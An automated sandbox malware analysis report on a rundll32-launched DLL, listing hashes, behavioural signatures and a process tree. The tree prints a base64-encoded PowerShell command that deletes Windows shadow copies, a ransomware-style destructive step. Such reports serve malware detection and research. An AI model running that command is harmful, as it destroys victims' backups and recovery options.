Analysis
-
max time kernel
91s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
04-06-2022 17:46
Static task
static1
Behavioral task
behavioral1
Sample
0ec8eff45c314050b4db7b496e8dd9f2bf92672cb0c2bca939e5f225281993de.dll
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
0ec8eff45c314050b4db7b496e8dd9f2bf92672cb0c2bca939e5f225281993de.dll
Resource
win10v2004-20220414-en
General
-
Target
0ec8eff45c314050b4db7b496e8dd9f2bf92672cb0c2bca939e5f225281993de.dll
-
Size
164KB
-
MD5
6292c8c2c15a0ca798795465005bbe3c
-
SHA1
391f2971ace53fb10f0bedd006eb43efcdcb1aa5
-
SHA256
0ec8eff45c314050b4db7b496e8dd9f2bf92672cb0c2bca939e5f225281993de
-
SHA512
b657e2f07b3ee64ef2f12e9d6540e016c2db3c23a0f4311867762931031a8f7858a74d234e2550211d0f334cf2833c1a94567f08efe4605589a76b25220a0b18
Malware Config
Signatures
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
rundll32.exedescription ioc process File opened (read-only) \??\L: rundll32.exe File opened (read-only) \??\M: rundll32.exe File opened (read-only) \??\R: rundll32.exe File opened (read-only) \??\W: rundll32.exe File opened (read-only) \??\A: rundll32.exe File opened (read-only) \??\E: rundll32.exe File opened (read-only) \??\Q: rundll32.exe File opened (read-only) \??\U: rundll32.exe File opened (read-only) \??\J: rundll32.exe File opened (read-only) \??\P: rundll32.exe File opened (read-only) \??\H: rundll32.exe File opened (read-only) \??\I: rundll32.exe File opened (read-only) \??\K: rundll32.exe File opened (read-only) \??\T: rundll32.exe File opened (read-only) \??\V: rundll32.exe File opened (read-only) \??\Y: rundll32.exe File opened (read-only) \??\F: rundll32.exe File opened (read-only) \??\G: rundll32.exe File opened (read-only) \??\Z: rundll32.exe File opened (read-only) \??\O: rundll32.exe File opened (read-only) \??\S: rundll32.exe File opened (read-only) \??\X: rundll32.exe File opened (read-only) \??\B: rundll32.exe File opened (read-only) \??\N: rundll32.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
rundll32.exepowershell.exepid process 5100 rundll32.exe 5100 rundll32.exe 4968 powershell.exe 4968 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 4968 powershell.exe Token: SeBackupPrivilege 1048 vssvc.exe Token: SeRestorePrivilege 1048 vssvc.exe Token: SeAuditPrivilege 1048 vssvc.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
rundll32.exerundll32.exedescription pid process target process PID 4684 wrote to memory of 5100 4684 rundll32.exe rundll32.exe PID 4684 wrote to memory of 5100 4684 rundll32.exe rundll32.exe PID 4684 wrote to memory of 5100 4684 rundll32.exe rundll32.exe PID 5100 wrote to memory of 4968 5100 rundll32.exe powershell.exe PID 5100 wrote to memory of 4968 5100 rundll32.exe powershell.exe
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\0ec8eff45c314050b4db7b496e8dd9f2bf92672cb0c2bca939e5f225281993de.dll,#11⤵
- Suspicious use of WriteProcessMemory
PID:4684 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\0ec8eff45c314050b4db7b496e8dd9f2bf92672cb0c2bca939e5f225281993de.dll,#12⤵
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5100 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4968
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2640
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1048